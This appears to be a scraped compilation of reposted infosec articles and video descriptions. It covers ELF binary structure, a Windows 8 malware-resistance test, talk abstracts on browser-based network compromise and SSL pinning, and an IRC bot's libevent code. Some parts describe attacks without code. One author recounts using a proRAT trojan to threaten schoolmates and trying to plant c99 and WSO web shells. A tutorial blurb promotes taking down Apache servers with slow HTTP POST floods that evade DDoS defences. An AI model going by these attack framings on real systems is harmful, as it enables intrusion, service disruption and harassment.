.comment PROGBITS 00000000 001014 00002a 01 MS 0 0 1 [27] .shstrtab STRTAB 00000000 00103e 0000e9 00 0 0 1 [28] .symtab SYMTAB 00000000 0015d8 000340 10 29 32 4 [29] .strtab STRTAB 00000000 001918 00014d 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings) I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown) O (extra OS processing required) o (OS specific), p (processor specific) There are no section groups in this file. Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x00140 0x00140 R E 0x4 INTERP 0x000174 0x08048174 0x08048174 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08048000 0x08048000 0x00554 0x00554 R E 0x1000 LOAD 0x000f0c 0x08049f0c 0x08049f0c 0x00108 0x00110 RW 0x1000 DYNAMIC 0x000f20 0x08049f20 0x08049f20 0x000d0 0x000d0 RW 0x4 NOTE 0x000188 0x08048188 0x08048188 0x00020 0x00020 R 0x4 GNU_EH_FRAME 0x000500 0x08048500 0x08048500 0x00014 0x00014 R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 GNU_RELRO 0x000f0c 0x08049f0c 0x08049f0c 0x000f4 0x000f4 R 0x1 PAX_FLAGS 0x000000 0x00000000 0x00000000 0x00000 0x00000 0x4 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.ABI-tag .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss 04 .dynamic 05 .note.ABI-tag 06 .eh_frame_hdr 07 08 .ctors .dtors .jcr .dynamic .got 09 Dynamic section at offset 0xf20 contains 21 entries: Tag Type Name/Value 0x00000001 (NEEDED) Shared library: [libc.so.6] 0x0000000c (INIT) 0x80482d8 0x0000000d (FINI) 0x80484cc 0x00000004 (HASH) 0x80481a8 0x6ffffef5 (GNU_HASH) 0x80481d0 0x00000005 (STRTAB) 0x8048240 0x00000006 (SYMTAB) 0x80481f0 0x0000000a (STRSZ) 76 (bytes) 0x0000000b (SYMENT) 16 (bytes) 0x00000015 (DEBUG) 0x0 0x00000003 (PLTGOT) 0x8049ff4 0x00000002 (PLTRELSZ) 24 (bytes) 0x00000014 (PLTREL) REL 0x00000017 (JMPREL) 0x80482c0 0x00000011 (REL) 0x80482b8 0x00000012 (RELSZ) 8 (bytes) 0x00000013 (RELENT) 8 (bytes) 0x6ffffffe (VERNEED) 0x8048298 0x6fffffff (VERNEEDNUM) 1 0x6ffffff0 (VERSYM) 0x804828c 0x00000000 (NULL) 0x0 Relocation section '.rel.dyn' at offset 0x2b8 contains 1 entries: Offset Info Type Sym.Value Sym. Name 08049ff0 00000206 R_386_GLOB_DAT 00000000 __gmon_start__ Relocation section '.rel.plt' at offset 0x2c0 contains 3 entries: Offset Info Type Sym.Value Sym. Name 0804a000 00000107 R_386_JUMP_SLOT 00000000 printf 0804a004 00000207 R_386_JUMP_SLOT 00000000 __gmon_start__ 0804a008 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main There are no unwind sections in this file. Symbol table '.dynsym' contains 5 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 00000000 0 FUNC GLOBAL DEFAULT UND printf@GLIBC_2.0 (2) 2: 00000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__ 3: 00000000 0 FUNC GLOBAL DEFAULT UND __libc_start_main@GLIBC_2.0 (2) 4: 080484ec 4 OBJECT GLOBAL DEFAULT 15 _IO_stdin_used Symbol table '.symtab' contains 52 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 08048174 0 SECTION LOCAL DEFAULT 1 2: 08048188 0 SECTION LOCAL DEFAULT 2 3: 080481a8 0 SECTION LOCAL DEFAULT 3 4: 080481d0 0 SECTION LOCAL DEFAULT 4 5: 080481f0 0 SECTION LOCAL DEFAULT 5 6: 08048240 0 SECTION LOCAL DEFAULT 6 7: 0804828c 0 SECTION LOCAL DEFAULT 7 8: 08048298 0 SECTION LOCAL DEFAULT 8 9: 080482b8 0 SECTION LOCAL DEFAULT 9 10: 080482c0 0 SECTION LOCAL DEFAULT 10 11: 080482d8 0 SECTION LOCAL DEFAULT 11 12: 080482f0 0 SECTION LOCAL DEFAULT 12 13: 08048330 0 SECTION LOCAL DEFAULT 13 14: 080484cc 0 SECTION LOCAL DEFAULT 14 15: 080484e8 0 SECTION LOCAL DEFAULT 15 16: 08048500 0 SECTION LOCAL DEFAULT 16 17: 08048514 0 SECTION LOCAL DEFAULT 17 18: 08049f0c 0 SECTION LOCAL DEFAULT 18 19: 08049f14 0 SECTION LOCAL DEFAULT 19 20: 08049f1c 0 SECTION LOCAL DEFAULT 20 21: 08049f20 0 SECTION LOCAL DEFAULT 21 22: 08049ff0 0 SECTION LOCAL DEFAULT 22 23: 08049ff4 0 SECTION LOCAL DEFAULT 23 24: 0804a00c 0 SECTION LOCAL DEFAULT 24 25: 0804a014 0 SECTION LOCAL DEFAULT 25 26: 00000000 0 SECTION LOCAL DEFAULT 26 27: 00000000 0 FILE LOCAL DEFAULT ABS hello.c 28: 08049f0c 0 NOTYPE LOCAL DEFAULT 18 __init_array_end 29: 08049f20 0 OBJECT LOCAL DEFAULT 21 _DYNAMIC 30: 08049f0c 0 NOTYPE LOCAL DEFAULT 18 __init_array_start 31: 08049ff4 0 OBJECT LOCAL DEFAULT 23 _GLOBAL_OFFSET_TABLE_ 32: 08048490 5 FUNC GLOBAL DEFAULT 13 __libc_csu_fini 33: 08048495 0 FUNC GLOBAL HIDDEN 13 __i686.get_pc_thunk.bx 34: 0804a00c 0 NOTYPE WEAK DEFAULT 24 data_start 35: 00000000 0 FUNC GLOBAL DEFAULT UND printf@@GLIBC_2.0 36: 0804a014 0 NOTYPE GLOBAL DEFAULT ABS _edata 37: 080484cc 0 FUNC GLOBAL DEFAULT 14 _fini 38: 08049f18 0 OBJECT GLOBAL HIDDEN 19 __DTOR_END__ 39: 0804a00c 0 NOTYPE GLOBAL DEFAULT 24 __data_start 40: 00000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__ 41: 0804a010 0 OBJECT GLOBAL HIDDEN 24 __dso_handle 42: 080484ec 4 OBJECT GLOBAL DEFAULT 15 _IO_stdin_used 43: 00000000 0 FUNC GLOBAL DEFAULT UND __libc_start_main@@GLIBC_ 44: 08048430 90 FUNC GLOBAL DEFAULT 13 __libc_csu_init 45: 0804a01c 0 NOTYPE GLOBAL DEFAULT ABS _end 46: 08048330 0 FUNC GLOBAL DEFAULT 13 _start 47: 080484e8 4 OBJECT GLOBAL DEFAULT 15 _fp_hw 48: 0804a014 0 NOTYPE GLOBAL DEFAULT ABS __bss_start 49: 08048404 29 FUNC GLOBAL DEFAULT 13 main 50: 00000000 0 NOTYPE WEAK DEFAULT UND _Jv_RegisterClasses 51: 080482d8 0 FUNC GLOBAL DEFAULT 11 _init Histogram for bucket list length (total of 3 buckets): Length Number % of total Coverage 0 0 ( 0.0%) 1 2 ( 66.7%) 50.0% 2 1 ( 33.3%) 100.0% Histogram for `.gnu.hash' bucket list length (total of 2 buckets): Length Number % of total Coverage 0 1 ( 50.0%) 1 1 ( 50.0%) 100.0% Version symbols section '.gnu.version' contains 5 entries: Addr: 000000000804828c Offset: 0x00028c Link: 5 (.dynsym) 000: 0 (*local*) 2 (GLIBC_2.0) 0 (*local*) 2 (GLIBC_2.0) 004: 1 (*global*) Version needs section '.gnu.version_r' contains 1 entries: Addr: 0x0000000008048298 Offset: 0x000298 Link: 6 (.dynstr) 000000: Version: 1 File: libc.so.6 Cnt: 1 0x0010: Name: GLIBC_2.0 Flags: none Version: 2 Notes at offset 0x00000188 with length 0x00000020: Owner Data size Description GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag) OS: Linux, ABI: 2.6.9 Conclusion We’ve now seen how a simple program written in C is converted into the assembly code, the object file and finally the executable file. While in the C code, the program didn’t have any sections, it had two sections in assembly dialect: the .rodata and .text. When we compiled it into an object file and finally into the executable, the file had more and more sections that are needed for the program to be executed successfully. Sursa: InfoSec Institute Resources – Hello World: C, Assembly, Object File and Executable

Forensic Artifact: Malware Analysis in Windows 8 Joseph Orekoya January 07, 2013 Windows is the most used operating system worldwide. I have met a lot of IT guys in my country and also other computer elites. My discovery was that 90 percent of them use Windows. I felt maybe that was just in my country, then I decided to contact some friends from UK, USA, India, and Pakistan, and they said the same about the wide use of Windows OS in their countries. However, the case was a bit different for that of the guy in the USA and I also noticed that a lot of my friends there use the MAC OS X. This doesn’t change the fact that Windows is still more used worldwide and because of this, hackers and intruders have had a lot more time to study Windows and create a lot of malware for it. The popular Windows OS has been tagged the most vulnerable OS. Now there is a new Windows OS. The question is: Is it vulnerable as well? This article focuses on the new version of Windows. Windows 8 was released on October 26, 2012. It was designed to work perfectly on a touch screen. The interface is so catchy!! As a computer lover, I follow a page on Facebook named “computer freaks.” Recently, this picture was posted, showing that in the timeline of the Microsoft Windows operating system they have always had a good OS, then a bad OS, and then a good one again. Kind of like an arithmetic progression with a common difference of one among the good Windows operating system. Because of this, I decided to do an analysis on this Windows 8 edition of Microsoft Windows to see what will really make it bad or “SHIT,” as the picture puts it. I began to do research on Windows 8 and I discovered that three patches have already been released for Microsoft’s new operating system. This reminds me of when Vista was released, there were so many patches that they just had to make a better version of Windows OS (Windows 7). I’ve used Windows 7 for a long time and I’ve also met some Windows 7 power users that can testify that it is a good one from Microsoft. However, I still think Windows XP stands a higher ranking when we focus on system stability. Speaking more fully of malware, one of Microsoft’s major objectives is to reduce the risk of their OS being infected by malware. As a result, several measures have been taken to reduce the chances of malware infection in Windows 8. Jason Garms of Microsoft has provided some tips on how to keep your PC free from malware in the link below: Protecting you from malware - Building Windows 8 - Site Home - MSDN Blogs Windows 8 has proven to be less vulnerable to malware, because the Windows Defender that comes with it is very active with good heuristics for detecting malwares. Even with all the new security, the common saying still remains true: there is no total security and therefore you cannot be totally secure from malware on Windows 8 but the risk of being affected by malware is just reduced. Windows 8 got better in a lot of ways to the point that their error page had a transformation. This doesn’t have to do with malware, but one thing I still don’t like about the Windows OS is the inability to retain commands on the console (command prompt) after the cmd is closed and reopened. For those who work more on the console, you can imagine using a lot of very long commands and then, simply because you mistakenly closed this console session, when you open another, all those commands are gone and you need to retype them. This is unlike the terminal (console) in Linux. I read and heard from different sources that Windows 8 was secure but I am a big time skeptic, so I had to prove it to myself. To be sure of the fact that Windows 8 is not so vulnerable to malware, I had to start by creating a proRAT Trojan server with my Windows 7 machine and then I sent it to my Windows 8. I have tried this Trojan several times and I’m no novice with it. I used it often in the days when I loved threatening schoolmates in the network, and I still have a good handle on it. As soon as I sent the server file to the Windows 8 OS with an external drive, Windows Defender deleted it. This was really amazing. I don’t have any third-party AV installed and my computer could react that way with malware. I had even seen some Windows 7 OS with third-party AVs that will not detect the server file due to poor heuristics. However, one third-party AV you can rely on to some extent is Norton with its bloodhound heuristics. The image below is what I got when I put my Trojan server on Windows 8: The image below contains the hexadecimal of the Trojan server that was used Windows 8 is indisputably the most secure Microsoft Windows, but we cannot still match its malware detection with MAC OS X. I realized that the Windows 8 defender that protects us from malware is the popular Microsoft Security Essentials. It’s good the way they saved us the cost of buying Microsoft Security Essentials separately. There are interesting testimonies everywhere about Windows 8 and its safe usage and security but this doesn’t make it impeccable. Although I’ve not personally found any faults in Windows 8, from my research I discovered that the new Windows version that was released already had its first security patch on November 13, 2012, which was just a few weeks after it was released. Also, not that I’m very sure about this, but I came across an article that said the Bitdefender company had tested some malware on Windows 8 and one piece of malware had its way with Windows 8. This particular malware is capable of creating backdoors that allow hackers to remotely control the computer of the host and also to steal gaming credentials and a lot more. However, the company used malware collected over the last six months, which is not ideal, because the test sample won’t include every threat and also because every antivirus product misses some software nastiness, giving a greater chance to the attacker. Bitdefender also tested the malware by fetching a copy of the malicious code from an internal FTP server and executing it to see how far the malware progresses–as opposed to visiting a booby-trapped web page that attempts to compromise the PC, which is a more common method of infection. In theory, there should be little difference, but this methodology bypasses Windows Defender’s SmartScreen, which filters out phishing attacks and malware downloads when using Internet Explorer. Well, this is not an issue to make you reconsider using Windows 8, because a lot of antivirus vendors are just trying to find a fault in the Windows Defender (built-in Microsoft Security Essentials) in order to provide a chance for their own AVs. Another test I tried is the backdoor. I installed WAMP server in Windows 8 on my VMware and I tried to upload a backdoor shell onto it from my host operating system. I kept trying this but to no avail. Then I tried to manually drop the shell into the guest Windows 8 OS server directory. It turned out while cleaning up the file that I received a message notifying me that malware was detected and could not be accessed. I know c99, c100, GNY, and r57 shells are very well-known and restricted by a lot of anti-malware programs. Because of this, I tried to use a WSO shell, but it was still functionless. Left to me, I will say that Windows 8 is like a means to put an end to a hacker’s invasion on web servers. Probably, if most webservers on Linux OS are moved to Windows 8, the hackers would have a lesser chance to upload backdoor shells to damage our web contents. Since some of the antivirus companies have predicted future security shortcomings on the secure Windows 8, we also have to be prepared to keep our PCs protected. I will start by providing you with good software for analyzing Windows executable files. With this software, you can check to see if there is anything attached with an executable application you want to run on your computer. It is called PEid, which identifies “portable executables.” Download with the MediaFire link: PEiD-0.95-20081103.zip If it happens an attacker successfully finds way to drop his malware on your PC, you can also remove it manually from your computer, but you must be very careful because there are some malwares with anti-tracing features that can make your OS crash the moment you detect them. So to find them, you will go to your registry and follow the given registry keys to check for these malwares: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrenVersion\RunServicesOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\VMM32Files HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\VxD The reason for locating the malware yourself is because of polymorphic malwares. These are malwares that make it impossible for antivirus and firewalls to detect them. Some of the malwares can make themselves run at your system startup by replicating themselves to the following: Config.sys (a system32 folder) Autoexec.bat (rootdrive) System.ini (Windows folder) Before using the registry keys to locate the files, you may consider disconnecting yourself from the network where it’s likely an attacker is using the malware to attack you. After locating any suspicious file in the registry keys, you can double-click the file to find its path, as the image below shows: As a regular Windows user, you should know we can’t delete files that are working in the background, so we need to check for this file in the task manager processes and stop it. That’s not malicious software, but it’s the exact file I examined in the registry. If it were malicious, I would just click the “End Process” button to put an end to its work. Now you can go back to the directory you were given by the registry and delete the file. After this, you will need to restart your PC if you know the malicious software has not caused much damage to your computer. If it has eaten some of your system files up, you may need to upgrade your Windows OS by using an installation CD to go through the installation process again. This way your files remain intact in a folder, “WindowsOld,” in your C: directory. I have given a link to download the PEid. Now I will show you a little way to make use of this software in examining your executable files. When you unpack the rar file I gave in the link, you will see an interface like the one below: Do not mind the Windows Explorer look of my own software, it’s just a skinpack. On your PC, the three blue dots should be minimize, maximize, and close button. To check details about a particular exe file, you can select the file in the first option of the PEid GUI. Now to check the active processes that may include the malware, you can click “Task Viewer,” which gives you a result like the task manager does. When you select any task, it will show every file attached to the process and working with it. PEid is a really good solution for malware detection. Windows 8 Defender uses the colors green, yellow, and red to show its security level. To make your Windows 8 more secure from malwares, I will advise that you should update Windows Defender as often as possible, as you would any third-party antivirus if you really want to stay secure. Sometimes malware will be placed in software that you already have on your PC. For instance, suppose you downloaded a game that was functioning properly before it started malfunctioning. It is advisable to do an md5 checksum on downloaded files so when it gets suspicious, you can do a checksum again to compare with the previous test and then you will be able to say if it has been tampered with. You can download software for checking your md5 on Windows here: NetTools4.5.74 - Download - 4shared - Joseph Orekoya References Windows 8 already getting security patches | PCWorld Protecting you from malware - Building Windows 8 - Site Home - MSDN Blogs AnandTech - Windows 8 Malware Protection Detailed Windows Defender and Windows SmartScreen fight viruses and other malware - Microsoft Windows Windows 8 'harder for malware to exploit', says security analysis • The Register http://propellerheadforensics.files.wordpress.com/2012/05/thomson_windows-8-forensic-guide2.pdf Sursa: InfoSec Institute Resources – Forensic Artifact: Malware Analysis in Windows 8

Owasp Http Post Dos Apache Webserver Attack Description: This Tutorials shows, how you can easily take out an Apache Webserver with one HTTP POST Tool using a std. slow DSL Connection. This is NO Slowloris Attack! Limitations of HTTP GET DDOS attack: - Does not work on IIS web servers or web servers with timeout limits for HTTP headers. - Easily defensible using popular load balancers, such as F5 and Cisco, reverse proxies and certain Apache modules, such as mod_antiloris. - Anti-DDOS systems may use "delayed binding"/"TCP Splicing" to defend against HTTP GET attacks. Why HTTP POST DDOS attack works - This attack can evade Layer 4 detection techniques as there is no malformed TCP, just like Slowloris. - Unlike Slowloris, there is no delay in sending HTTP Header, hence nullifying IIS built-in defense, making IIS vulnerable too. - Size, character sets and time intervals can be randomised to foil any recognition of Layer 7 traffic patterns by DDOS protection systems. - Difficult to differentiate from legit connections which are slow Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Owasp Http Post Dos Apache Webserver Attack

Microsoft Internet Explorer Cbutton Object Use-After-Free Vulnerability - Metasploit Demo Description: Author: ======= Mzer0 : 4 X Security Team | Just another WordPress site https://twitter.com/4xsecurityteam Tested on Windows XP SP3 With IE 8 -------------------------------------------------------- Description: ---------------- This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting ainly China/Taiwan/and US-based computers Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Microsoft Internet Explorer Cbutton Object Use-After-Free Vulnerability - Metasploit Demo

Blended Threats And Javascript: A Plan For Permanent Network Compromise Description: This is a version of the talk I gave at Black Hat USA 2012, updated specifically for the AppSec USA audience. The original BlackHat slides are available at "scribd.com/doc/101185061/Blended-Threats-and-JavaScript", and the source code used in the demonstrations is available at "github.com/superevr/ddwrt-install-tool". During Black Hat 2006, it was shown how common Web browser attacks could be leveraged bypass perimeter firewalls and "Hack Intranet Websites from the Outside." In the years since, the fundamental problems were never addressed and the Intranet remains wide open, probably because the attack techniques described had important limitations. These limitations prevented mass scale and persistent compromise of network connected devices, which include but are not limited to home broadband routers. Now in 2012, with the help of new research and next-generation technologies like HTML5, browser-based Intranet attacks have overcome many of the old limitations and improved to a new degree of scary. This presentation will cover state-of-the-art browser-to-network threats launched with JavaScript, using zero to minimal user interaction and complete every step of the exploit attack cycle. Starting with enumeration and discovery, escalating the attack further upstream and into embedded network devices, and ultimately mass-scale permanent compromise. ***** Speaker: Phil Perviance, Application Security Consultant, AppSec Consulting, Inc. Phil Purviance is an Application Security Consultant for AppSec Consulting where he researches application security vulnerabilities and performs penetration testing. Phil's body of work includes the discovery and proof-of-concept exploitations of critical security vulnerabilities, design flaws, and system weaknesses in hundreds of custom web sites and web application frameworks. Phil also consults with clients and recommends helpful countermeasures that are useful to mitigate serious security vulnerabilities. Phil's recent exploit talks include the security of HTML5, and the revealing of cross-site scripting vulnerabilities in Skype for iOS. When asked, "Why do you look for bugs in popular websites," he answers, "Because it's fun!" Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Blended Threats and JavaScript: A Plan for Permanent Network Compromise - Phil Perviance on Vimeo Sursa: Blended Threats And Javascript: A Plan For Permanent Network Compromise

Securing The Ssl Channel Against Man-In-The-Middle Attacks Description: Abstract In the last year, 2011, major trusted CAs providing trusted certificates for SSL/TLS in browser scenarios were compromised (e.g. as seen in the Diginotar breach) and based on the current trust models (trusting all registered CAs equally for all domains) exposed vital web applications to the risk of man-in-the-middle attacks. Several approaches are currently discussed to mitigate this risk. The most advanced and closest to final adoption being the technologies discussed by the browser vendors at the recent IETF Web Security working group meetings: HSTS and pinning of certificates. To better protect content providers against the distribution of bogus certificates, an HTTP header extension containing a fingerprint of their certificates linked to a domain address has been defined. This approach, which has been partly tested in Chrome, and already helped identify and protect to some extend Google's web application in the recent Diginotar compromise. Chrome users were able to detect the bogus DigiNotar certificates because Chrome had embedded the hashes of valid Google certificates. Back in July 2011, the hacked DigiNotar certificate authority (CA), which has since gone out of business, was used to issue more than five hundred bogus certificates for companies including Google and various intelligence services. The presented technologies are cutting edge and although the specification is not final yet, they are in their final stages and currently in roll-out and ready to be used. Other models that compete or complement this approach shall also be discussed (DNSSEC, etc. ). ***** Speaker: Tobias Gondrom, Managing Director, Thames Stanley: Information Security and Risk Management Advisory Passionate about: OWASP, Application Security (yeah!), CISO training, information security & risk management in global organisations, IETF, info sec research (!), ... Tobias Gondrom is Managing Director of Thames Stanley, a CISO and Information Security & Risk Management Advisory based in Hong Kong, United Kingdom and Germany. He has fifteen years of experience in software development, application security, cryptography, electronic signatures and global standardisation organisations working for independent software vendors and large global corporations in the financial, technology and government sector, in America, EMEA and APAC. As the Global Head of the Security Team at Open Text (2005-2007) and from 2000-2004 as the lead of the Security Task Force at IXOS Software AG, he was responsible for security, risk and incident management and introduced and implemented a secure SDLC used globally by development departments in the US, Canada, UK and Germany. Since 2003 he is the chair of working groups of the IETF (ietf.org) in the security area, member of the IETF security directorate, and since 2010 chair of the formed web security WG at the IETF, and a former chapter lead of the German OWASP chapter from 2007 to 2008, and currently board member of OWASP London and member of the OWASP Global Industry Committee. Tobias is the author of the international standards RFC 4998 and RFC 6283 (Evidence Record Syntax) and co-author and contributor to a number of internet standards and papers on security and electronic signatures, as well as the co-author of the book „Secure Electronic Archiving“ (ISBN 3-87081-427-6), and frequent presenter at conferences and publication of articles (e.g. AppSec, IETF, ISSE, Moderner Staat, VOI-booklet “Electronic Signature“, iX). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Securing the SSL channel against man-in-the-middle attacks - Tobias Gondrom on Vimeo Sursa: Securing The Ssl Channel Against Man-In-The-Middle Attacks

Reverse Engineering Secure Http Api's With An Ssl Proxy Description: Abstract The proliferation of mobile devices has led to increased emphasis on native applications, such as Objective-C applications written for iOS or Java applications written for Android. Nonetheless, these native client applications frequently use HTTP APIs to communicate with a backend server. In addition, browser-based applications are growing more complex, and are also more likely to make asynchronous calls to HTTP APIs. In this presentation, we walk through a common (but insecure) method of securing HTTP APIs with SSL. As we will demonstrate, properly configured SSL will protect a protocol from eavesdropping (man-in-the-middle attack) but will not protect that protocol from the end user himself. In particular, we demonstrate how an end user can use an SSL proxy to decrypt and reverse engineer the HTTP API. We will show a hypothetical HTTP API over SSL that tracks high scores for games. Then we will demonstrate an attack on that HTTP API using mitmproxy, an open source SSL proxy, to show how an attacker can forge a high score, even though the protocol is tunneled over SSL. We will then demonstrate a modified HTTP API that is resistant to this type of attack. Finally, we will wrap up by discussing other applications of SSL proxies to web application security testing, such as analyzing HTTP APIs to see if any personal information – such as a user’s address book – are being transmitted over the API. This is the same technique used by researcher Arun Thampi in February 2012 to determine that the Path application on iOS was secretly uploading users’ contacts to its HTTP API. ***** Speakers Alejandro Caceres, Computer Network Operations Engineer, Lunarline Inc. I am a computer network operations engineer focused on building software products and interested in breaking things, mostly. I've been told I have a "hacker" mindset by my co-workers (I like to think that they meant it in a good way) and that is entirely true. I work on a number of open source projects related to pen testing and particularly enjoy dealing with unique ways of automating exploitation of web applications. Mark Haase, Sr. Security Software Engineer, Lunarline, Inc. I've been writing software since I was 13, writing software as a job since Junior year of college, and working professionally as a software engineer since I graduated in financial services and then information security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Reverse Engineering Secure HTTP API's With an SSL Proxy - Alejandro Caceres and Mark Haase on Vimeo Sursa: Reverse Engineering Secure Http Api's With An Ssl Proxy

Dumping Memory Password Using Task Manager Description: This video is about dumping the memory contents of a process using task manager. In this video i have extracted a facebook account's password from browser memory dump using winhex. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dumping Memory Password Using Task Manager

[h=1]Event driven socket programming[/h]Author: [h=3]nslay[/h]I've been working on a fully featured IRC bot for a couple months on/off and I usually write my own IO multiplexer. This time, however, I gave libevent a try and decided to share my experiences. libevent Anyway, if you're not familiar with event-driven design and you're interested in socket programming, I strongly recommend you learn about event driven programming first since it tends to make socket programming easier and more flexible. Then employ something like libevent (or write your own) that allows you to hook IO events for sockets. You'll find that your code Generalizes to multiple sockets with no effort (and no threads) Often implicitly supports timers with no effort (depending on the underlying polling mechanism you use) Generalizes to multiple protocols (since you can just hook protocol-dependent handlers per socket) Seamlessly integrates with OOP well (rather than have one object that has a blocking recv() loop, just implement an OnRead() method and support multiple objects simultaneously!) Anyway, here's my IRC bot. It is fully featured, though since it's a replica of something written in ~1998, doesn't have cool features like searching wikipedia (for example). http://sourceforge.n...rojects/ircbnx/ To see examples of event driven design, look at IrcClient.cpp and BnxDriver.cpp. Specific snippits are included below. Relevant snippits from IrcClient.cpp Here's a nifty trick to dispatch C callbacks to C++ member functions (I learned this trick from here) template<void (IrcClient::*Method)(evutil_socket_t, short)> static void Dispatch(evutil_socket_t fd, short what, void *arg) { IrcClient *pObject = (IrcClient *)arg; (pObject->*Method)(fd, what); } You can redirect C callbacks to your C++ member functions. In this case, I use it dispatch C callbacks to the following basic IO/timer functions: // Libevent callbacks void OnWrite(evutil_socket_t fd, short what); void OnRead(evutil_socket_t fd, short what); void OnSendTimer(evutil_socket_t fd, short what); You can use the basic Read/Write events to determine When a socket has completed a connection (OnWrite() is called) Receiving data (OnRead() is called and recv() returns > 0) When the remote host has closed the connection (OnRead() is called and recv() returns 0) Here's how you do it in an event driven framework. Here is IrcClient::Connect() First create the socket: bool IrcClient::Connect(const std::string &strServer, const std::string &strPort) { if (m_socket != INVALID_SOCKET) Disconnect(); m_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (m_socket == INVALID_SOCKET) { Log("socket failed (%d): %s", errno, strerror(errno)); return false; } Next, set it to non-blocking. Non-blocking means that connect() and recv() will never put the process to sleep until the request has completed. It's easy to understand why you want this in the context of multiple connections. If you are handling 50 sockets, and you do not enable non-blocking I/O, then mishandling just one of those sockets causes the process to hang (and the other 49 sockets will not receive service until a request has completed one that one socket). #ifdef _WIN32 u_long opt = 1; if (ioctlsocket(m_socket, FIONBIO, &opt) != 0) { Log("ioctlsocket failed (%d)", WSAGetLastError()); CloseSocket(); return false; } #else // _WIN32 int flags = fcntl(m_socket, F_GETFL); if (fcntl(m_socket, F_SETFL, flags | O_NONBLOCK) == -1) { Log("fcntl failed (%d): %s", errno, strerror(errno)); CloseSocket(); return false; } #endif // !_WIN32 In this code, I use getaddrinfo() to resolve hostnames. It is more flexible and hides the hackish way you normally resolve a hostname and setup a sockaddr. struct addrinfo hints, *pResults = NULL; memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_PASSIVE; hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; int e = getaddrinfo(strServer.c_str(), strPort.c_str(), &hints, &pResults); if (e != 0) { Log("getaddrinfo failed (%d): %s", e, gai_strerror(e)); CloseSocket(); return false; } Now we connect the socket. It will most likely fail with EAGAIN or WSAEWOULDBLOCK depending on platform. These mean the connection in progress and not yet completed and so you must treat these as not errors. // NOTE: Cast to socklen_t since Windows make ai_addrlen size_t e = connect(m_socket, pResults->ai_addr, (socklen_t)pResults->ai_addrlen); #ifdef _WIN32 int iLastError = WSAGetLastError(); if (e != 0 && iLastError != WSAEWOULDBLOCK) { Log("connect() failed (%d)", iLastError); CloseSocket(); freeaddrinfo(pResults); return false; } #else // _WIN32 if (e != 0 && errno != EINPROGRESS) { Log("connect() failed (%d): %s", errno, strerror(errno)); CloseSocket(); freeaddrinfo(pResults); return false; } #endif // !_WIN32 freeaddrinfo(pResults); Now, we create our event contexts and hook them. The write event is only meant to be triggered once to determine connectivity, hence EV_PERSIST is missing. Our read event is intended to be used to receive data and is set to EV_PERSIST. The last created event is a timer for send queues. We only initially need to hook OnWrite() since we need to determine when the connect() has actually completed. Once it completes, we can then hook OnRead() and OnSendTimer(). Notice the use of the templated Dispatch() function. Nifty huh? // XXX: Handle errors? m_pWriteEvent = event_new(m_pEventBase, m_socket, EV_WRITE, &Dispatch<&IrcClient::OnWrite>, this); m_pReadEvent = event_new(m_pEventBase, m_socket, EV_READ | EV_PERSIST, &Dispatch<&IrcClient::OnRead>, this); m_pSendTimer = event_new(m_pEventBase, -1, EV_PERSIST, &Dispatch<&IrcClient::OnSendTimer>, this); event_add(m_pWriteEvent, NULL); m_strCurrentServer = strServer; m_strCurrentPort = strPort; return true; } Now here's OnWrite(). First it hooks OnRead() and then it sets up the send queue timer to run in 0.5 second increments. Because the write event was not created with EV_PERSIST, it will only trigger once. void IrcClient::OnWrite(evutil_socket_t fd, short what) { event_add(m_pReadEvent, NULL); // TODO: Tunable for send timer struct timeval tv; tv.tv_sec = 0; 